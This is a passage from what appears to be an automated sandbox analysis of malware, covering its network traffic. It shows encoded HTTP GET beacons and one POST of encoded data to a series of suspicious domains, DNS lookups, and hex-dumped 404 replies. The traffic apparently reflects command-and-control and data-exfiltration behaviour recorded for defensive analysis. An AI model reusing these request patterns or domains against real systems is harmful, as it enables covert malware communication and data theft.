                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.tekilla.wtf
                Connection: close
                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic; HTTP traffic detected: GET /3qit/?y0qt3F=t3sSYQcRGIG2xp6hThC36NAa5pulFT6rmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYRx0f6/FSPt3YGxqpBfNEWUCZ6CvMlkEJ/uE=&kZ=E8WpI HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.bola88site.one
                Connection: close
                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic; HTTP traffic detected: GET /nxfn/?y0qt3F=6j3CvtUhPdUgNSN69nh1RWvnIL+RhJE9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVeUaFaQwVg8/fN6RHd5lVuyrWHiNmavf3gAw=&kZ=E8WpI HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.languagemodel.pro
                Connection: close
                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic; HTTP traffic detected: GET /3bdq/?y0qt3F=mPDvA1qI3GiuntP60bqgVobnrbMnRYp61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exu2k3ruJCpl2j2bvSmTd+X0q2Ansy3FLMFak=&kZ=E8WpI HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.kexweb.top
                Connection: close
                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic; HTTP traffic detected: GET /ikh0/?y0qt3F=lvx8xqKuEeZXr5ITqNCHPh3uOhDJ1jEsZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1vJ6qU/h+jhYmRiU/b4DSTDHjmvsEtFplu6A=&kZ=E8WpI HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.jobworklanka.online
                Connection: close
                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic; HTTP traffic detected: GET /h7lb/?y0qt3F=RbPHaORuq3VLsIvFE+kS4135sHK2QWKtxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0V+w2gPP1i9gS6DQX/6Khz8EBa74P+FOl6aE=&kZ=E8WpI HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.dyme.tech
                Connection: close
                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic; HTTP traffic detected: GET /e0nr/?y0qt3F=K/5K1kUHGJjjXPw2ZEkIjVgmoRaszrgI6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txK3JHWMG30o4pyFBBCDSCP6CBkBrnoqSCbT0=&kZ=E8WpI HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.mizuquan.top
                Connection: close
                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic; HTTP traffic detected: GET /pp43/?y0qt3F=/yzCblrJsERuqgz3jJaeg3gXWqInWNIu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVu5vGFEpVLHigJkCccCfv+m7blBfZ8lkEAhE=&kZ=E8WpI HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.nobartv6.website
                Connection: close
                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic; HTTP traffic detected: GET /lrst/?y0qt3F=mDrmkSN/AS2kB6lxw+ox9UfR9hI3CHIhmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KclyEBWGGMepgvGhsxtLzd1Vd+SluWBGSo6Y=&kZ=E8WpI HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.sailnway.net
                Connection: close
                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic; DNS traffic detected: DNS query: www.woshop.online
            Source: global traffic; DNS traffic detected: DNS query: www.kxshopmr.store
            Source: global traffic; DNS traffic detected: DNS query: www.elsupertodo.net
            Source: global traffic; DNS traffic detected: DNS query: www.omexai.info
            Source: global traffic; DNS traffic detected: DNS query: www.tekilla.wtf
            Source: global traffic; DNS traffic detected: DNS query: www.bola88site.one
            Source: global traffic; DNS traffic detected: DNS query: www.languagemodel.pro
            Source: global traffic; DNS traffic detected: DNS query: www.kexweb.top
            Source: global traffic; DNS traffic detected: DNS query: www.jobworklanka.online
            Source: global traffic; DNS traffic detected: DNS query: www.dyme.tech
            Source: global traffic; DNS traffic detected: DNS query: www.arlon-commerce.com
            Source: global traffic; DNS traffic detected: DNS query: www.mizuquan.top
            Source: global traffic; DNS traffic detected: DNS query: www.nobartv6.website
            Source: global traffic; DNS traffic detected: DNS query: www.sailnway.net
            Source: unknown; HTTP traffic detected: POST /7xi5/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Encoding: gzip, deflate
                Accept-Language: en-US,en;q=0.9
                Host: www.omexai.info
                Origin: http://www.omexai.info
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 203
                Connection: close
                Cache-Control: max-age=0
                Referer: http://www.omexai.info/7xi5/
                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                Data Ascii: y0qt3F=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5hbXbPv8OsLjCAcpqmQOo1Wpau5ANHvVsg==
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/plain; charset=utf-8
                X-Content-Type-Options: nosniff
                Date: Thu, 26 Sep 2024 07:24:27 GMT
                Content-Length: 19
                Connection: close
                Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                Data Ascii: 404 page not found
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/plain; charset=utf-8
                X-Content-Type-Options: nosniff
                Date: Thu, 26 Sep 2024 07:24:30 GMT
                Content-Length: 19
                Connection: close
                Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                Data Ascii: 404 page not found
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/plain; charset=utf-8
                X-Content-Type-Options: nosniff
                Date: Thu, 26 Sep 2024 07:24:35 GMT
                Content-Length: 19
                Connection: close
                Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                Data Ascii: 404 page not found
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Thu, 26 Sep 2024 07:24:41 GMT
                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Thu, 26 Sep 2024 07:24:44 GMT
                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Thu, 26 Sep 2024 07:24:46 GMT
                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Thu, 26 Sep 2024 07:24:49 GMT
                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 26 Sep 2024 07:25:13 GMT
                Server: Apache
                X-Frame-Options: SAMEORIGIN
                Content-Length: 389
                X-XSS-Protection: 1; mode=block
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 26 Sep 2024 07:25:16 GMT
                Server: Apache
                X-Frame-Options: SAMEORIGIN
                Content-Length: 389
                X-XSS-Protection: 1; mode=block
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Thu, 26 Sep 2024 07:25:18 GMT
                Server: Apache
                X-Frame-Options: SAMEORIGIN
                Content-Length: 389
                X-XSS-Protection: 1; mode=block
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:21 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:27 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:27 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:27 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:29 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:32 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:34 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 07:26:08 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 07:26:10 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 